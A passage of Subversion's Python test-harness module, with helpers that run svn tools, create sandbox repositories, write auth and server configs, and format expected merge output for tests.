bufsize,
stdin=stdin,
stdout=stdout,
stderr=stderr,
close_fds=not windows)
return p.stdin, p.stdout, p.stderr, (p, command_string)
def wait_on_pipe(waiter, binary_mode, stdin=None):
"""WAITER is (KID, COMMAND_STRING). Wait for KID (opened with open_pipe)
to finish, dying if it does. If KID fails, create an error message
containing any stdout and stderr from the kid. Show COMMAND_STRING in
diagnostic messages. Normalize Windows line endings of stdout and stderr
if not BINARY_MODE. Return KID's exit code as int; stdout, stderr as
lists of lines (including line terminators)."""
if waiter is None:
return
kid, command_string = waiter
stdout, stderr = kid.communicate(stdin)
exit_code = kid.returncode
# Normalize Windows line endings if in text mode.
if windows and not binary_mode:
stdout = stdout.replace('\r\n', '\n')
stderr = stderr.replace('\r\n', '\n')
# Convert output strings to lists.
stdout_lines = stdout.splitlines(True)
stderr_lines = stderr.splitlines(True)
if exit_code < 0:
if not windows:
exit_signal = os.WTERMSIG(-exit_code)
else:
exit_signal = exit_code
if stdout_lines is not None:
logger.info("".join(stdout_lines))
if stderr_lines is not None:
logger.warning("".join(stderr_lines))
# show the whole path to make it easier to start a debugger
logger.warning("CMD: %s terminated by signal %d"
% (command_string, exit_signal))
raise SVNProcessTerminatedBySignal
else:
if exit_code:
logger.info("CMD: %s exited with %d" % (command_string, exit_code))
return stdout_lines, stderr_lines, exit_code
def spawn_process(command, bufsize=-1, binary_mode=False, stdin_lines=None,
*varargs):
"""Run any binary, supplying input text, logging the command line.
BUFSIZE dictates the pipe buffer size used in communication with the
subprocess: quoting from subprocess.Popen(), "0 means unbuffered,
1 means line buffered, any other positive value means use a buffer of
(approximately) that size. A negative bufsize means to use the system
default, which usually means fully buffered."
Normalize Windows line endings of stdout and stderr if not BINARY_MODE.
Return exit code as int; stdout, stderr as lists of lines (including
line terminators).
"""
if stdin_lines and not isinstance(stdin_lines, list):
raise TypeError("stdin_lines should have list type")
# Log the command line
if not command.endswith('.py'):
logger.info('CMD: %s %s' % (os.path.basename(command),
' '.join([_quote_arg(x) for x in varargs])))
infile, outfile, errfile, kid = open_pipe([command] + list(varargs), bufsize)
if stdin_lines:
for x in stdin_lines:
infile.write(x)
stdout_lines, stderr_lines, exit_code = wait_on_pipe(kid, binary_mode)
infile.close()
outfile.close()
errfile.close()
return exit_code, stdout_lines, stderr_lines
def run_command_stdin(command, error_expected, bufsize=-1, binary_mode=False,
stdin_lines=None, *varargs):
"""Run COMMAND with VARARGS; input STDIN_LINES (a list of strings
which should include newline characters) to program via stdin - this
should not be very large, as if the program outputs more than the OS
is willing to buffer, this will deadlock, with both Python and
COMMAND waiting to write to each other for ever. For tests where this
is a problem, setting BUFSIZE to a sufficiently large value will prevent
the deadlock, see spawn_process().
Normalize Windows line endings of stdout and stderr if not BINARY_MODE.
Return exit code as int; stdout, stderr as lists of lines (including
line terminators).
If ERROR_EXPECTED is None, any stderr output will be printed and any
stderr output or a non-zero exit code will raise an exception."""
start = time.time()
exit_code, stdout_lines, stderr_lines = spawn_process(command,
bufsize,
binary_mode,
stdin_lines,
*varargs)
def _line_contains_repos_diskpath(line):
# ### Note: this assumes that either svn-test-work isn't a symlink,
# ### or the diskpath isn't realpath()'d somewhere on the way from
# ### the server's configuration and the client's stderr. We could
# ### check for both the symlinked path and the realpath.
return \
os.path.join('cmdline', 'svn-test-work', 'repositories') in line \
or os.path.join('cmdline', 'svn-test-work', 'local_tmp', 'repos') in line
for lines, name in [[stdout_lines, "stdout"], [stderr_lines, "stderr"]]:
if is_ra_type_file() or 'svnadmin' in command or 'svnlook' in command:
break
# Does the server leak the repository on-disk path?
# (prop_tests-12 installs a hook script that does that intentionally)
if any(map(_line_contains_repos_diskpath, lines)) \
and not any(map(lambda arg: 'prop_tests-12' in arg, varargs)):
raise Failure("Repository diskpath in %s: %r" % (name, lines))
stop = time.time()
logger.info('<TIME = %.6f>' % (stop - start))
for x in stdout_lines:
logger.info(x.rstrip())
for x in stderr_lines:
logger.info(x.rstrip())
if (not error_expected) and ((stderr_lines) or (exit_code != 0)):
for x in stderr_lines:
logger.warning(x.rstrip())
if len(varargs) <= 5:
brief_command = ' '.join((command,) + varargs)
else:
brief_command = ' '.join(((command,) + varargs)[:4]) + ' ...'
raise Failure('Command failed: "' + brief_command +
'"; exit code ' + str(exit_code))
return exit_code, \
filter_dbg(stdout_lines), \
stderr_lines
def create_config_dir(cfgdir, config_contents=None, server_contents=None,
ssl_cert=None, ssl_url=None, http_proxy=None):
"Create config directories and files"
# config file names
cfgfile_cfg = os.path.join(cfgdir, 'config')
cfgfile_srv = os.path.join(cfgdir, 'servers')
# create the directory
if not os.path.isdir(cfgdir):
os.makedirs(cfgdir)
# define default config file contents if none provided
if config_contents is None:
config_contents = """
#
[auth]
password-stores =
[miscellany]
interactive-conflicts = false
"""
# define default server file contents if none provided
if server_contents is None:
http_library_str = ""
if options.http_library:
http_library_str = "http-library=%s" % (options.http_library)
http_proxy_str = ""
if options.http_proxy:
http_proxy_parsed = urlparse("//" + options.http_proxy)
http_proxy_str = "http-proxy-host=%s\n" % (http_proxy_parsed.hostname) + \
"http-proxy-port=%d" % (http_proxy_parsed.port or 80)
server_contents = """
#
[global]
%s
%s
store-plaintext-passwords=yes
store-passwords=yes
""" % (http_library_str, http_proxy_str)
file_write(cfgfile_cfg, config_contents)
file_write(cfgfile_srv, server_contents)
if (ssl_cert and ssl_url):
trust_ssl_cert(cfgdir, ssl_cert, ssl_url)
elif cfgdir != default_config_dir:
copy_trust(cfgdir, default_config_dir)
def trust_ssl_cert(cfgdir, ssl_cert, ssl_url):
"""Setup config dir to trust the given ssl_cert for the given ssl_url
"""
cert_rep = ''
fp = open(ssl_cert, 'r')
for line in fp.readlines()[1:-1]:
cert_rep = cert_rep + line.strip()
parsed_url = urlparse(ssl_url)
netloc_url = '%s://%s' % (parsed_url.scheme, parsed_url.netloc)
ssl_dir = os.path.join(cfgdir, 'auth', 'svn.ssl.server')
if not os.path.isdir(ssl_dir):
os.makedirs(ssl_dir)
md5_name = hashlib.md5(netloc_url).hexdigest()
md5_file = os.path.join(ssl_dir, md5_name)
md5_file_contents = """K 10
ascii_cert
V %d
%s
K 8
failures
V 1
8
K 15
svn:realmstring
V %d
%s
END
""" % (len(cert_rep), cert_rep, len(netloc_url), netloc_url)
file_write(md5_file, md5_file_contents)
def copy_trust(dst_cfgdir, src_cfgdir):
"""Copy svn.ssl.server files from one config dir to another.
"""
src_ssl_dir = os.path.join(src_cfgdir, 'auth', 'svn.ssl.server')
dst_ssl_dir = os.path.join(dst_cfgdir, 'auth', 'svn.ssl.server')
if not os.path.isdir(dst_ssl_dir):
os.makedirs(dst_ssl_dir)
for f in os.listdir(src_ssl_dir):
shutil.copy(os.path.join(src_ssl_dir, f), os.path.join(dst_ssl_dir, f))
def _with_config_dir(args):
if '--config-dir' in args:
return args
else:
return args + ('--config-dir', default_config_dir)
def _with_auth(args):
assert '--password' not in args
args = args + ('--password', wc_passwd,
'--no-auth-cache' )
if '--username' in args:
return args
else:
return args + ('--username', wc_author )
# For running subversion and returning the output
def run_svn(error_expected, *varargs):
"""Run svn with VARARGS; return exit code as int; stdout, stderr as
lists of lines (including line terminators). If ERROR_EXPECTED is
None, any stderr output will be printed and any stderr output or a
non-zero exit code will raise an exception. If
you're just checking that something does/doesn't come out of
stdout/stderr, you might want to use actions.run_and_verify_svn()."""
return run_command(svn_binary, error_expected, False,
*(_with_auth(_with_config_dir(varargs))))
# For running svnadmin. Ignores the output.
def run_svnadmin(*varargs):
"""Run svnadmin with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
use_binary = ('dump' in varargs)
exit_code, stdout_lines, stderr_lines = \
run_command(svnadmin_binary, 1, use_binary, *varargs)
if use_binary and sys.platform == 'win32':
# Callers don't expect binary output on stderr
stderr_lines = [x.replace('\r', '') for x in stderr_lines]
return exit_code, stdout_lines, stderr_lines
# For running svnlook. Ignores the output.
def run_svnlook(*varargs):
"""Run svnlook with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
return run_command(svnlook_binary, 1, False, *varargs)
def run_svnrdump(stdin_input, *varargs):
"""Run svnrdump with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators). Use binary mode for output."""
if stdin_input:
return run_command_stdin(svnrdump_binary, 1, 1, True, stdin_input,
*(_with_auth(_with_config_dir(varargs))))
else:
return run_command(svnrdump_binary, 1, True,
*(_with_auth(_with_config_dir(varargs))))
def run_svnsync(*varargs):
"""Run svnsync with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators)."""
return run_command(svnsync_binary, 1, False, *(_with_config_dir(varargs)))
def run_svnversion(*varargs):
"""Run svnversion with VARARGS, returns exit code as int; stdout, stderr
as list of lines (including line terminators)."""
return run_command(svnversion_binary, 1, False, *varargs)
def run_svnmucc(*varargs):
"""Run svnmucc with VARARGS, returns exit code as int; stdout, stderr as
list of lines (including line terminators). Use binary mode for output."""
return run_command(svnmucc_binary, 1, True,
*(_with_auth(_with_config_dir(varargs))))
def run_svnauthz(*varargs):
"""Run svnauthz with VARARGS, returns exit code as int; stdout, stderr
as list of lines (including line terminators)."""
return run_command(svnauthz_binary, 1, False, *varargs)
def run_svnauthz_validate(*varargs):
"""Run svnauthz-validate with VARARGS, returns exit code as int; stdout,
stderr as list of lines (including line terminators)."""
return run_command(svnauthz_validate_binary, 1, False, *varargs)
def run_entriesdump(path):
"""Run the entries-dump helper, returning a dict of Entry objects."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None, path)
if exit_code or stderr_lines:
### report on this? or continue to just skip it?
return None
class Entry(object):
pass
entries = { }
exec(''.join(filter_dbg(stdout_lines)))
return entries
def run_entriesdump_subdirs(path):
"""Run the entries-dump helper, returning a list of directory names."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None, '--subdirs', path)
return map(lambda line: line.strip(), filter_dbg(stdout_lines))
def run_entriesdump_tree(path):
"""Run the entries-dump helper, returning a dict of a dict of Entry objects."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
0, False, None,
'--tree-dump', path)
if exit_code or stderr_lines:
### report on this? or continue to just skip it?
return None
class Entry(object):
pass
dirs = { }
exec(''.join(filter_dbg(stdout_lines)))
return dirs
def run_atomic_ra_revprop_change(url, revision, propname, skel, want_error):
"""Run the atomic-ra-revprop-change helper, returning its exit code, stdout,
and stderr. For HTTP, default HTTP library is used."""
# use spawn_process rather than run_command to avoid copying all the data
# to stdout in verbose mode.
#exit_code, stdout_lines, stderr_lines = spawn_process(entriesdump_binary,
# 0, False, None, path)
# This passes HTTP_LIBRARY in addition to our params.
return run_command(atomic_ra_revprop_change_binary, True, False,
url, revision, propname, skel,
want_error and 1 or 0, default_config_dir)
def run_wc_lock_tester(recursive, path):
"Run the wc-lock obtainer tool, returning its exit code, stdout and stderr"
if recursive:
option = "-r"
else:
option = "-1"
return run_command(wc_lock_tester_binary, False, False, option, path)
def run_wc_incomplete_tester(wc_dir, revision):
"Run the wc-incomplete tool, returning its exit code, stdout and stderr"
return run_command(wc_incomplete_tester_binary, False, False,
wc_dir, revision)
def youngest(repos_path):
"run 'svnlook youngest' on REPOS_PATH, returns revision as int"
exit_code, stdout_lines, stderr_lines = run_command(svnlook_binary, None, False,
'youngest', repos_path)
if exit_code or stderr_lines:
raise Failure("Unexpected failure of 'svnlook youngest':\n%s" % stderr_lines)
if len(stdout_lines) != 1:
raise Failure("Wrong output from 'svnlook youngest':\n%s" % stdout_lines)
return int(stdout_lines[0].rstrip())
# Chmod recursively on a whole subtree
def chmod_tree(path, mode, mask):
for dirpath, dirs, files in os.walk(path):
for name in dirs + files:
fullname = os.path.join(dirpath, name)
if not os.path.islink(fullname):
new_mode = (os.stat(fullname)[stat.ST_MODE] & ~mask) | mode
os.chmod(fullname, new_mode)
# For clearing away working copies
def safe_rmtree(dirname, retry=0):
"""Remove the tree at DIRNAME, making it writable first.
If DIRNAME is a symlink, only remove the symlink, not its target."""
def rmtree(dirname):
chmod_tree(dirname, 0666, 0666)
shutil.rmtree(dirname)
if os.path.islink(dirname):
os.unlink(dirname)
return
if not os.path.exists(dirname):
return
if retry:
for delay in (0.5, 1, 2, 4):
try:
rmtree(dirname)
break
except:
time.sleep(delay)
else:
rmtree(dirname)
else:
rmtree(dirname)
# For making local mods to files
def file_append(path, new_text):
"Append NEW_TEXT to file at PATH"
open(path, 'a').write(new_text)
# Append in binary mode
def file_append_binary(path, new_text):
"Append NEW_TEXT to file at PATH in binary mode"
open(path, 'ab').write(new_text)
# For creating new files, and making local mods to existing files.
def file_write(path, contents, mode='w'):
"""Write the CONTENTS to the file at PATH, opening file using MODE,
which is (w)rite by default."""
open(path, mode).write(contents)
# For replacing parts of contents in an existing file, with new content.
def file_substitute(path, contents, new_contents):
"""Replace the CONTENTS in the file at PATH using the NEW_CONTENTS"""
fcontent = open(path, 'r').read().replace(contents, new_contents)
open(path, 'w').write(fcontent)
# For creating blank new repositories
def create_repos(path, minor_version = None):
"""Create a brand-new SVN repository at PATH. If PATH does not yet
exist, create it."""
if not os.path.exists(path):
os.makedirs(path) # this creates all the intermediate dirs, if neccessary
opts = ("--bdb-txn-nosync",)
if not minor_version or minor_version > options.server_minor_version:
minor_version = options.server_minor_version
opts += ("--compatible-version=1.%d" % (minor_version),)
if options.fs_type is not None:
opts += ("--fs-type=" + options.fs_type,)
exit_code, stdout, stderr = run_command(svnadmin_binary, 1, False, "create",
path, *opts)
# Skip tests if we can't create the repository.
if stderr:
stderr_lines = 0
not_using_fsfs_backend = (options.fs_type != "fsfs")
backend_deprecation_warning = False
for line in stderr:
stderr_lines += 1
if line.find('Unknown FS type') != -1:
raise Skip
if not_using_fsfs_backend:
if 0 < line.find('repository back-end is deprecated, consider using'):
backend_deprecation_warning = True
# Creating BDB repositories will cause svnadmin to print a warning
# which should be ignored.
if (stderr_lines == 1
and not_using_fsfs_backend
and backend_deprecation_warning):
pass
else:
# If the FS type is known and we noticed more than just the
# BDB-specific warning, assume the repos couldn't be created
# (e.g. due to a missing 'svnadmin' binary).
raise SVNRepositoryCreateFailure("".join(stderr).rstrip())
# Require authentication to write to the repos, for ra_svn testing.
file_write(get_svnserve_conf_file_path(path),
"[general]\nauth-access = write\n");
if options.enable_sasl:
file_append(get_svnserve_conf_file_path(path),
"realm = svntest\n[sasl]\nuse-sasl = true\n")
else:
file_append(get_svnserve_conf_file_path(path), "password-db = passwd\n")
# This actually creates TWO [users] sections in the file (one of them is
# uncommented in `svnadmin create`'s template), so we exercise the .ini
# files reading code's handling of duplicates, too. :-)
file_append(os.path.join(path, "conf", "passwd"),
"[users]\njrandom = rayjandom\njconstant = rayjandom\n");
if options.fs_type is None or options.fs_type == 'fsfs':
# fsfs.conf file
if options.config_file is not None and \
(not minor_version or minor_version >= 6):
shutil.copy(options.config_file, get_fsfs_conf_file_path(path))
# format file
if options.fsfs_sharding is not None:
def transform_line(line):
if line.startswith('layout '):
if options.fsfs_sharding > 0:
line = 'layout sharded %d' % options.fsfs_sharding
else:
line = 'layout linear'
return line
# read it
format_file_path = get_fsfs_format_file_path(path)
contents = open(format_file_path, 'rb').read()
# tweak it
new_contents = "".join([transform_line(line) + "\n"
for line in contents.split("\n")])
if new_contents[-1] == "\n":
# we don't currently allow empty lines (\n\n) in the format file.
new_contents = new_contents[:-1]
# replace it
os.chmod(format_file_path, 0666)
file_write(format_file_path, new_contents, 'wb')
# post-commit
# Note that some tests (currently only commit_tests) create their own
# post-commit hooks, which would override this one. :-(
if options.fsfs_packing:
# some tests chdir.
abs_path = os.path.abspath(path)
create_python_hook_script(get_post_commit_hook_path(abs_path),
"import subprocess\n"
"import sys\n"
"command = %s\n"
"sys.exit(subprocess.Popen(command).wait())\n"
% repr([svnadmin_binary, 'pack', abs_path]))
# make the repos world-writeable, for mod_dav_svn's sake.
chmod_tree(path, 0666, 0666)
# For copying a repository
def copy_repos(src_path, dst_path, head_revision, ignore_uuid = 1,
minor_version = None):
"Copy the repository SRC_PATH, with head revision HEAD_REVISION, to DST_PATH"
# Save any previous value of SVN_DBG_QUIET
saved_quiet = os.environ.get('SVN_DBG_QUIET')
os.environ['SVN_DBG_QUIET'] = 'y'
# Do an svnadmin dump|svnadmin load cycle. Print a fake pipe command so that
# the displayed CMDs can be run by hand
create_repos(dst_path, minor_version)
dump_args = ['dump', src_path]
load_args = ['load', dst_path]
if ignore_uuid:
load_args = load_args + ['--ignore-uuid']
logger.info('CMD: %s %s | %s %s' %
(os.path.basename(svnadmin_binary), ' '.join(dump_args),
os.path.basename(svnadmin_binary), ' '.join(load_args)))
start = time.time()
dump_in, dump_out, dump_err, dump_kid = open_pipe(
[svnadmin_binary] + dump_args)
load_in, load_out, load_err, load_kid = open_pipe(
[svnadmin_binary] + load_args,
stdin=dump_out) # Attached to dump_kid
load_stdout, load_stderr, load_exit_code = wait_on_pipe(load_kid, True)
dump_stdout, dump_stderr, dump_exit_code = wait_on_pipe(dump_kid, True)
dump_in.close()
dump_out.close()
dump_err.close()
#load_in is dump_out so it's already closed.
load_out.close()
load_err.close()
stop = time.time()
logger.info('<TIME = %.6f>' % (stop - start))
if saved_quiet is None:
del os.environ['SVN_DBG_QUIET']
else:
os.environ['SVN_DBG_QUIET'] = saved_quiet
dump_re = re.compile(r'^\* Dumped revision (\d+)\.\r?$')
expect_revision = 0
dump_failed = False
for dump_line in dump_stderr:
match = dump_re.match(dump_line)
if not match or match.group(1) != str(expect_revision):
logger.warn('ERROR: dump failed: %s', dump_line.strip())
dump_failed = True
else:
expect_revision += 1
if dump_failed:
raise SVNRepositoryCopyFailure
if expect_revision != head_revision + 1:
logger.warn('ERROR: dump failed; did not see revision %s', head_revision)
raise SVNRepositoryCopyFailure
load_re = re.compile(r'^------- Committed revision (\d+) >>>\r?$')
expect_revision = 1
for load_line in filter_dbg(load_stdout):
match = load_re.match(load_line)
if match:
if match.group(1) != str(expect_revision):
logger.warn('ERROR: load failed: %s', load_line.strip())
raise SVNRepositoryCopyFailure
expect_revision += 1
if expect_revision != head_revision + 1:
logger.warn('ERROR: load failed; did not see revision %s', head_revision)
raise SVNRepositoryCopyFailure
def canonicalize_url(input):
"Canonicalize the url, if the scheme is unknown, returns intact input"
m = re.match(r"^((file://)|((svn|svn\+ssh|http|https)(://)))", input)
if m:
scheme = m.group(1)
return scheme + re.sub(r'//*', '/', input[len(scheme):])
else:
return input
def create_python_hook_script(hook_path, hook_script_code,
cmd_alternative=None):
"""Create a Python hook script at HOOK_PATH with the specified
HOOK_SCRIPT_CODE."""
if windows:
if cmd_alternative is not None:
file_write("%s.bat" % hook_path,
cmd_alternative)
else:
# Use an absolute path since the working directory is not guaranteed
hook_path = os.path.abspath(hook_path)
# Fill the python file.
file_write("%s.py" % hook_path, hook_script_code)
# Fill the batch wrapper file.
file_write("%s.bat" % hook_path,
"@\"%s\" %s.py %%*\n" % (sys.executable, hook_path))
else:
# For all other platforms
file_write(hook_path, "#!%s\n%s" % (sys.executable, hook_script_code))
os.chmod(hook_path, 0755)
def write_restrictive_svnserve_conf(repo_dir, anon_access="none"):
"Create a restrictive authz file ( no anynomous access )."
fp = open(get_svnserve_conf_file_path(repo_dir), 'w')
fp.write("[general]\nanon-access = %s\nauth-access = write\n"
"authz-db = authz\n" % anon_access)
if options.enable_sasl:
fp.write("realm = svntest\n[sasl]\nuse-sasl = true\n");
else:
fp.write("password-db = passwd\n")
fp.close()
def write_restrictive_svnserve_conf_with_groups(repo_dir,
anon_access="none"):
"Create a restrictive configuration with groups stored in a separate file."
fp = open(get_svnserve_conf_file_path(repo_dir), 'w')
fp.write("[general]\nanon-access = %s\nauth-access = write\n"
"authz-db = authz\ngroups-db = groups\n" % anon_access)
if options.enable_sasl:
fp.write("realm = svntest\n[sasl]\nuse-sasl = true\n");
else:
fp.write("password-db = passwd\n")
fp.close()
# Warning: because mod_dav_svn uses one shared authz file for all
# repositories, you *cannot* use write_authz_file in any test that
# might be run in parallel.
#
# write_authz_file can *only* be used in test suites which disable
# parallel execution at the bottom like so
# if __name__ == '__main__':
# svntest.main.run_tests(test_list, serial_only = True)
def write_authz_file(sbox, rules, sections=None):
"""Write an authz file to SBOX, appropriate for the RA method used,
with authorizations rules RULES mapping paths to strings containing
the rules. You can add sections SECTIONS (ex. groups, aliases...) with
an appropriate list of mappings.
"""
fp = open(sbox.authz_file, 'w')
# When the sandbox repository is read only it's name will be different from
# the repository name.
repo_name = sbox.repo_dir
while repo_name[-1] == '/':
repo_name = repo_name[:-1]
repo_name = os.path.basename(repo_name)
if sbox.repo_url.startswith("http"):
prefix = repo_name + ":"
else:
prefix = ""
if sections:
for p, r in sections.items():
fp.write("[%s]\n%s\n" % (p, r))
for p, r in rules.items():
fp.write("[%s%s]\n%s\n" % (prefix, p, r))
fp.close()
# See the warning about parallel test execution in write_authz_file
# method description.
def write_groups_file(sbox, groups):
"""Write a groups file to SBOX, appropriate for the RA method used,
with group contents set to GROUPS."""
fp = open(sbox.groups_file, 'w')
fp.write("[groups]\n")
if groups:
for p, r in groups.items():
fp.write("%s = %s\n" % (p, r))
fp.close()
def use_editor(func):
os.environ['SVN_EDITOR'] = svneditor_script
os.environ['SVN_MERGE'] = svneditor_script
os.environ['SVNTEST_EDITOR_FUNC'] = func
os.environ['SVN_TEST_PYTHON'] = sys.executable
def mergeinfo_notify_line(revstart, revend, target=None):
"""Return an expected output line that describes the beginning of a
mergeinfo recording notification on revisions REVSTART through REVEND."""
if target:
target_re = re.escape(target)
else:
target_re = ".+"
if (revend is None):
if (revstart < 0):
revstart = abs(revstart)
return "--- Recording mergeinfo for reverse merge of r%ld into '%s':\n" \
% (revstart, target_re)
else:
return "--- Recording mergeinfo for merge of r%ld into '%s':\n" \
% (revstart, target_re)
elif (revstart < revend):
return "--- Recording mergeinfo for merge of r%ld through r%ld into '%s':\n" \
% (revstart, revend, target_re)
else:
return "--- Recording mergeinfo for reverse merge of r%ld through " \
"r%ld into '%s':\n" % (revstart, revend, target_re)
def merge_notify_line(revstart=None, revend=None, same_URL=True,
foreign=False, target=None):
"""Return an expected output line that describes the beginning of a
merge operation on revisions REVSTART through REVEND. Omit both
REVSTART and REVEND for the case where the left and right sides of
the merge are from different URLs."""
from_foreign_phrase = foreign and "\(from foreign repository\) " or ""
if target:
target_re = re.escape(target)
else:
target_re = ".+"
if not same_URL:
return "--- Merging differences between %srepository URLs into '%s':\n" \
% (foreign and "foreign " or "", target_re)
if revend is None:
if revstart is None:
# The left and right sides of the merge are from different URLs.
return "--- Merging differences between %srepository URLs into '%s':\n" \
% (foreign and "foreign " or "", target_re)
elif revstart < 0:
return "--- Reverse-merging %sr%ld into '%s':\n" \
% (from_foreign_phrase, abs(revstart), target_re)
else:
return "--- Merging %sr%ld into '%s':\n" \
% (from_foreign_phrase, revstart, target_re)
else:
if revstart > revend:
return "--- Reverse-merging %sr%ld through r%ld into '%s':\n" \
% (from_foreign_phrase, revstart, revend, target_re)
else:
return "--- Merging %sr%ld through r%ld into '%s':\n" \
% (from_foreign_phrase, revstart, revend, target_re)
def summary_of_conflicts(text_conflicts=0,
prop_conflicts=0,
tree_conflicts=0,
text_resolved=0,
prop_resolved=0,
tree_resolved=0,
skipped_paths=0,
as_regex=False):
"""Return a list of lines corresponding to the summary of conflicts and
skipped paths that is printed by merge and update and switch. If all
parameters are zero, return an empty list.
"""
lines = []
if (text_conflicts or prop_conflicts or tree_conflicts
or text_resolved or prop_resolved or tree_resolved
or skipped_paths):
lines.append("Summary of conflicts:\n")
if text_conflicts or text_resolved:
if text_resolved == 0:
lines.append(" Text conflicts: %d\n" % text_conflicts)
else:
lines.append(" Text conflicts: %d remaining (and %d already resolved)\n"
% (text_conflicts, text_resolved))
if prop_conflicts or prop_resolved:
if prop_resolved == 0:
lines.append(" Property conflicts: %d\n" % prop_conflicts)
else:
lines.append(" Property conflicts: %d remaining (and %d already resolved)\n"
% (prop_conflicts, prop_resolved))
if tree_conflicts or tree_resolved:
if tree_resolved == 0:
lines.append(" Tree conflicts: %d\n" % tree_conflicts)
else:
lines.append(" Tree conflicts: %d remaining (and %d already resolved)\n"
% (tree_conflicts, tree_resolved))
if skipped_paths:
lines.append(" Skipped paths: %d\n" % skipped_paths)
if as_regex:
lines = map(re.escape, lines)
return lines
def make_log_msg():
"Conjure up a log message based on the calling test."
for idx in range(1, 100):
frame = sys._getframe(idx)
# If this frame isn't from a function in *_tests.py, then skip it.
filename = frame.f_code.co_filename
if not filename.endswith('_tests.py'):
continue
# There should be a test_list in this module.
test_list = frame.f_globals.get('test_list')
if test_list is None:
continue
# If the function is not in the test_list, then skip it.
func_name = frame.f_code.co_name
func_ob = frame.f_globals.get(func_name)
if func_ob not in test_list:
continue
# Make the log message look like a line from a traceback.
# Well...close. We use single quotes to avoid interfering with the
# double-quote quoting performed on Windows
return "File '%s', line %d, in %s" % (filename, frame.f_lineno, func_name)
######################################################################
# Functions which check the test configuration
# (useful for conditional XFails)
def is_ra_type_dav():
return options.test_area_url.startswith('http')
def is_ra_type_dav_neon():
"""Return True iff running tests over RA-Neon.
CAUTION: Result is only valid if svn was built to support both."""
return options.test_area_url.startswith('http') and \
(options.http_library == "neon")
def is_ra_type_dav_serf():
"""Return True iff running tests over RA-Serf.
CAUTION: Result is only valid if svn was built to support both."""
return options.test_area_url.startswith('http') and \
(options.http_library == "serf")
def is_ra_type_svn():
"""Return True iff running tests over RA-svn."""
return options.test_area_url.startswith('svn')
def is_ra_type_file():
"""Return True iff running tests over RA-local."""
return options.test_area_url.startswith('file')
def is_fs_type_fsfs():
# This assumes that fsfs is the default fs implementation.
return options.fs_type == 'fsfs' or options.fs_type is None
def is_fs_type_bdb():
return options.fs_type == 'bdb'
def is_os_windows():
return os.name == 'nt'
def is_windows_type_dav():
return is_os_windows() and is_ra_type_dav()
def is_posix_os():
return os.name == 'posix'
def is_os_darwin():
return sys.platform == 'darwin'
def is_fs_case_insensitive():
return (is_os_darwin() or is_os_windows())
def is_threaded_python():
return True
def server_has_mergeinfo():
return options.server_minor_version >= 5
def server_has_revprop_commit():
return options.server_minor_version >= 5
def server_authz_has_aliases():
return options.server_minor_version >= 5
def server_gets_client_capabilities():
return options.server_minor_version >= 5
def server_has_partial_replay():
return options.server_minor_version >= 5
def server_enforces_UTF8_fspaths_in_verify():
return options.server_minor_version >= 6
def server_enforces_date_syntax():
return options.server_minor_version >= 5
def server_has_atomic_revprop():
return options.server_minor_version >= 7
def is_plaintext_password_storage_disabled():
try:
predicate = re.compile("^WARNING: Plaintext password storage is enabled!")
code, out, err = run_svn(False, "--version")
for line in out:
if predicate.match(line):
return False
except:
return False
return True
# https://issues.apache.org/bugzilla/show_bug.cgi?id=56480
# https://issues.apache.org/bugzilla/show_bug.cgi?id=55397
__mod_dav_url_quoting_broken_versions = frozenset([
'2.2.27',
'2.2.26',
'2.2.25',
'2.4.9',
'2.4.8',
'2.4.7',
'2.4.6',
'2.4.5',
])
def is_mod_dav_url_quoting_broken():
if is_ra_type_dav():
return (options.httpd_version in __mod_dav_url_quoting_broken_versions)
return None
def is_httpd_authz_provider_enabled():
if is_ra_type_dav():
v = options.httpd_version.split('.')
return (v[0] == '2' and int(v[1]) >= 3) or int(v[0]) > 2
return None
######################################################################
class TestSpawningThread(threading.Thread):
"""A thread that runs test cases in their own processes.
Receives test numbers to run from the queue, and saves results into
the results field."""
def __init__(self, queue, progress_func, tests_total):
threading.Thread.__init__(self)
self.queue = queue
self.results = []
self.progress_func = progress_func
self.tests_total = tests_total
def run(self):
while True:
try:
next_index = self.queue.get_nowait()
except queue.Empty:
return
self.run_one(next_index)
# signal progress
if self.progress_func:
self.progress_func(self.tests_total - self.queue.qsize(),
self.tests_total)
def run_one(self, index):
command = os.path.abspath(sys.argv[0])
args = []
args.append(str(index))
args.append('-c')
# add some startup arguments from this process
if options.fs_type:
args.append('--fs-type=' + options.fs_type)
if options.test_area_url:
args.append('--url=' + options.test_area_url)
if logger.getEffectiveLevel() <= logging.DEBUG:
args.append('-v')
if options.cleanup:
args.append('--cleanup')
if options.enable_sasl:
args.append('--enable-sasl')
if options.http_library:
args.append('--http-library=' + options.http_library)
if options.server_minor_version:
args.append('--server-minor-version=' + str(options.server_minor_version))
if options.mode_filter:
args.append('--mode-filter=' + options.mode_filter)
if options.milestone_filter:
args.append('--milestone-filter=' + options.milestone_filter)
if options.ssl_cert:
args.append('--ssl-cert=' + options.ssl_cert)
if options.http_proxy:
args.append('--http-proxy=' + options.http_proxy)
if options.httpd_version:
args.append('--httpd-version=' + options.httpd_version)
result, stdout_lines, stderr_lines = spawn_process(command, 0, False, None,
*args)
self.results.append((index, result, stdout_lines, stderr_lines))
class TestRunner:
"""Encapsulate a single test case (predicate), including logic for
runing the test and test list output."""
def __init__(self, func, index):
self.pred = svntest.testcase.create_test_case(func)
self.index = index
def list(self, milestones_dict=None):
"""Print test doc strings. MILESTONES_DICT is an optional mapping
of issue numbers to an list containing target milestones and who
the issue is assigned to."""
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == self.pred.list_mode().upper() \
or (options.mode_filter.upper() == 'PASS' \
and self.pred.list_mode() == ''):
issues = []
tail = ''
if self.pred.issues:
if not options.milestone_filter or milestones_dict is None:
issues = self.pred.issues
tail += " [%s]" % ','.join(['#%s' % str(i) for i in issues])
else: # Limit listing by requested target milestone(s).
filter_issues = []
matches_filter = False
# Get the milestones for all the issues associated with this test.
# If any one of them matches the MILESTONE_FILTER then we'll print
